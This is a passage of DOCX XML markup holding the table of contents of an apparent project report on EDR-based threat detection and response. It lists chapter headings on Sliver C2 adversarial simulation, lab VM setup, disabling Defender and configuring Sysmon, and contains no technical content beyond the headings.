        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Literature Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………….…………..…7</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2.1 Overview of Cyber Threat Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………….………….…7</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2.1.1 Detection Mechanisms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………..……7</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2.1.2 Response Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………..…8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="600" w:firstLineChars="250"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.1.3 Importance of Timely Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………8</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2.2 EDR Tools in Cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………..………8</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2.3 Techniques for Threat Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………….………..……10</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2.3.1 Signature-Based Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………..…10</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2.3.2 Behavioral Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………11</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2.3.3 Machine Learning Algorithms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………11</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.3.4 Threat Intelligence Integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………11</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2.4 Virtualization Technologies in Cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………..…………12</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2.4.1 Key Aspects of Virtualization in Cybersecurity……………………………..12</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.4.2 Benefits of Virtualization in Cybersecurity………………………………….13</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2.5 Sliver C2 Framework and its Role in Adversarial Simulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………….……14</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2.5.1 Key Features of Sliver C2 Framework……………………………………....14</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.5.2 Role of Sliver in Adversarial Simulation…………………………………....15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………….…………16</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3.1 Software Requirement Specifications (SRS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………...…16</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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………………….16</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3.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 Overall Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………….18</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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Interface Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………….21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="600" w:firstLineChars="250"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>3.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Feature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>s………………………………………………………..……23</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3.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Other Nonfunctional Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………24</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3.2 Use Case Diagram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………………26</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3 Sequenc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e Diagram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………………28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………30</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4.1 Architecture Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………….…30</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4.2 Virtual Machine Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………….31</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4.3 Tool Installation and Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………….…………33</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4.4 Attack System Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………………34</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4.5 Detection and Response Rule Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………………..………36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="365F91"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.1 System Prerequisites and Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………....37</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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting Up SSH Client Access and Network Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………38</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5.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Setting Up SSH Client Access for Ubuntu Attacker VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………...38</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5.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Configuration for Both VMs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………39</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Disabling Windows Defender and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………39</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5.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Permanently Disable Microsoft Defender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
